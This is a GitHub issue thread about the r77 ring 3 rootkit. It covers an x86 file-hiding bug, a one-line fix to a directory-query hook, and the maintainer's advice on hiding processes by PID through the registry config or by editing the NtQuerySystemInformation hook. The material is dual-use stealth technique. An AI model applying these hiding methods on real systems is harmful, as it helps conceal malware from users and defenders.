search

bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License
1.59k stars 389 forks source link

Hiding files isn't work on architecture x86 #2

Closed Roganced closed 3 years ago

Roganced commented 5 years ago

The problem is in the header, but i have a one qustion: how can i hide registry keys, what api need to be hooked for this, is this possible in ring 3? Will you add this in the future?

p.s Good work!

bytecode77 commented 5 years ago

I didn't work on r77 in the recent time, however RegistryKey hiding is on the agenda and due to be done when I start working on it again.

You said you know what problem causes file hiding issues on x86?

Roganced commented 5 years ago

I'm sorry, but I don't know how to solve the problem of hiding files. Are you planning to work on improving the rootkit, in the near future? This project has no worthy analogues at the moment.

logan-x commented 5 years ago

Hello, bytecode77,thank you for the solution you proposed. As for the x86 failure, the problem caused by MinHook was tested by me. I replaced it with "mhook", so that it can run normally.

There is also a small problem, the root directory of the file hidden, will cause explorer. Exe crash, I will provide a pr later.

Thanks again for your project, which helped me a lot!

logan-x commented 5 years ago

Add a line to NewZwQueryDirectoryFile-- RtlCopyMemory: pPrevious = pCurrent; Now you can hide the root directory

bytecode77 commented 3 years ago

@logan-x I have tested your suggested fix and it works pretty well. Thank you very much for your input!

Currently, I'm working towards finalizing r77. Even though I haven't worked on it for a long time, I'm currently on it.

On the agenda:

I'm closing this issue for 0.6.x. Version 1.x is on it's way.

GV13057911485 commented 3 years ago

@logan-x I have tested your suggested fix and it works pretty well. Thank you very much for your input!

Currently, I'm working towards finalizing r77. Even though I haven't worked on it for a long time, I'm currently on it.

On the agenda:

  • Using detours instead of MinHook
  • Fix any x86 issues prior to any sort of release (no more beta releases before that)
  • Providing a proper toolchain and full technical documentation
  • Finalize implementation on Registry key/value hiding
  • Implement more entities in addition to processes, files and registry

I'm closing this issue for 0.6.x. Version 1.x is on it's way.

Hello ByteCode77,

Thank you for your excellent job! I was very excited when I was testing your rootkit, almost perfect!! Now I am wondering, is there any interface that I can input for telling rootkit my specified files, directories, registries which I want to hide?

I am still learning your rootkit, hope I can get more input, thank you, expert!

bytecode77 commented 3 years ago

Thank you, I am glad you like it!

Actually, there currently is the config system for hiding specific PID's and TCP/UDP ports. Would you find it useful to hide specific process names or specific filenames or absolute paths using the config system?

Right now, I'm collecting a lot of input and prioritizing requests that a lot of users have. If you could provide me with some input and specific examples, I may better understand what is important to users of r77 :) There is, indeed, a ToDo list and I'm working on features that users request the most.

GV13057911485 commented 3 years ago

Thank you, I am glad you like it!

Actually, there currently is the config system for hiding specific PID's and TCP/UDP ports. Would you find it useful to hide specific process names or specific filenames or absolute paths using the config system?

Right now, I'm collecting a lot of input and prioritizing requests that a lot of users have. If you could provide me with some input and specific examples, I may better understand what is important to users of r77 :) There is, indeed, a ToDo list and I'm working on features that users request the most.

I love you guys so much! at moment, I can see almost all functions are correct as you described in the documentation. Sure I would like r77 to help me hide those specific items that I want.

I tried to hide one of my processes, I could do it via "test console" only, and yes, it worked immediately, I was soooo happy! thereafter, i reboot the OS and found the process, which was hidden before rebooting, appeared again! I tried to write the PID into the registry, but it didn't work, because PID kept changing every reboot.

I would like to hide some of my specified files and directories, I didn't know how to do it, because I couldn't find a place to input the names of files or names of directories. So, I have to rename them as "$77***", they hid, but the process wouldn't work after renaming these items.

Hope this desired abilities be availabe soon.

Thank you guys anyway, the r77 is amazing!

bytecode77 commented 3 years ago

When hiding by PID, basically you need to write the PID every time the process starts. One example is the r77 service, which writes the svc32 and svc64 value under pid. Make sure to overwrite the same value name every time to avoid accumulation of PID's. This is a good solution for startup programs, where a prefix is unwanted or not possible (not possible for process hollowing). There is a maximum of ~1 second, between writing the PID and hiding taking effect.

Implementing hiding by a specified name using the config system is one of the next items on the agenda, as it was requested several times by now. If you want to modify the code in the meantime, it's a simple change in the HookedNtQuerySystemInformation. There is an if-statement that checks for the prefix and hidden PID.

You're welcome :)